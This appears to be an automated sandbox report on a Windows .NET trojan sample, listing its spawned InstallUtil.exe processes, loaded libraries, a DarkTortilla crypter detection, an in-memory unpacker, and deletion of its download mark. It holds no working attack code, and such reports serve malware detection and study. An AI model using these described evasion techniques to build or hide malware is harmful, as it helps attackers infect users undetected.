Source: SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe, 00000000.00000002.1624916508.0000000006A40000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameRP8SH.dll, vs SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe
Source: SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe, 00000000.00000002.1622766007.0000000006150000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameHPzFG9.dll" vs SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe
Source: SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe, 00000000.00000002.1613458656.00000000011CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe
Source: SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe, 00000000.00000000.1248675173.00000000002D6000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilename333.exeH vs SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe
Source: SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Binary or memory string: OriginalFilename333.exeH vs SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe

Source: SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@3/1@3/3

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe.log

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Mutant created: NULL

Source: SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	ReversingLabs: Detection: 28%
Source: SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Virustotal: Detection: 32%

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: gpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe

Static file information: File size 1067008 > 1048576

Source: SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x104000

Source: SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected DarkTortilla Crypter

Source: Yara match	File source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe.6150000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe.6150000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1622766007.0000000006150000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1614555856.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe PID: 5768, type: MEMORYSTR

.NET source code contains potential unpacker

Source: SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe, n4RMc.cs

.Net Code: Mc54 System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_014EB11F push eax; ret	0_2_014EB125
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_063BA227 push esp; retn 0000h	0_2_063BA231
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_063BA2BA push esp; retn 0000h	0_2_063BA2BB
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_063BA078 push esp; retn 0000h	0_2_063BA079
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_063BDE30 push es; ret	0_2_063BDE40
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06A79E60 pushfd ; retf	0_2_06A79E65
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06B06215 push eax; ret	0_2_06B0631E
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06B0D81B push ebx; ret	0_2_06B0D821
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06B07271 pushad ; ret	0_2_06B07273
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D36FD8 push es; retn D370h	0_2_06D3749C
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D374AB push es; retn D370h	0_2_06D3749C
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D325D5 push es; retf	0_2_06D32644
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D48F55 push es; ret	0_2_06D48F58
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D440F1 push es; ret	0_2_06D44100
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D4BC19 push es; ret	0_2_06D4BC24
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Code function: 0_2_06D4BC2D push es; iretd	0_2_06D4BC40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 11_2_00680F20 pushad ; ret	11_2_00680E8D

Source: SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe

Static PE information: section name: .text entropy: 7.662456866055934

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe

File opened: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe\:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
